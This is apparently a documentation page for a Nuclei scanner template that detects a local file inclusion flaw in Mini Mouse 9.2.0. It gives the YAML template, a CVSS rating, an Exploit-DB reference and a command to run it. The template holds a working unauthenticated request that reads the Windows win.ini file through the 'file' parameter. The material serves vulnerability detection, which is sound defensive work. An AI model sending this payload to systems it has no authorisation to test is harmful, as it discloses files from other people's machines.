Skip to content

Mini Mouse 9.2.0 - Local File Inclusion

ID: minimouse-lfi

Severity: high

Author: 0x_Akoko

Tags: lfi,edb,minimouse

Mini Mouse 9.2.0 is vulnerable to local file inclusion because it allows remote unauthenticated attackers to include and disclose the content of locally stored files via the ‘file’ parameter.

id: minimouse-lfi
info:
name: Mini Mouse 9.2.0 - Local File Inclusion
author: 0x_Akoko
severity: high
description: Mini Mouse 9.2.0 is vulnerable to local file inclusion because it allows remote unauthenticated attackers to include and disclose the content of locally stored files via the 'file' parameter.
reference:
- https://www.exploit-db.com/exploits/49744
classification:
cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
cvss-score: 7.5
cwe-id: CWE-22
metadata:
max-request: 1
tags: lfi,edb,minimouse
http:
- method: GET
path:
- "{{BaseURL}}/file=C:%5CWindows%5Cwin.ini"
matchers-condition: and
matchers:
- type: status
status:
- 200
- type: word
words:
- "bit app support"
- "fonts"
- "extensions"
condition: and
part: body
# digest: 4a0a00473045022100d704904f98e60e8a68246805f15fab0eda5a659e0aea2d948c1415d55fe3b86102206cbb44fa27598e84de4f8c9db4ab2cdde768988d602a9c2e434bf130b823c606:922c64590222798bb761d5b6d8e72950

This template is used to detect vulnerabilities in web applications. It can be used with the Nuclei tool to scan for specific patterns or behaviors.

Terminal window
$ nuclei -u "URL" -t "http/vulnerabilities/other/minimouse-lfi.yaml"

View on Github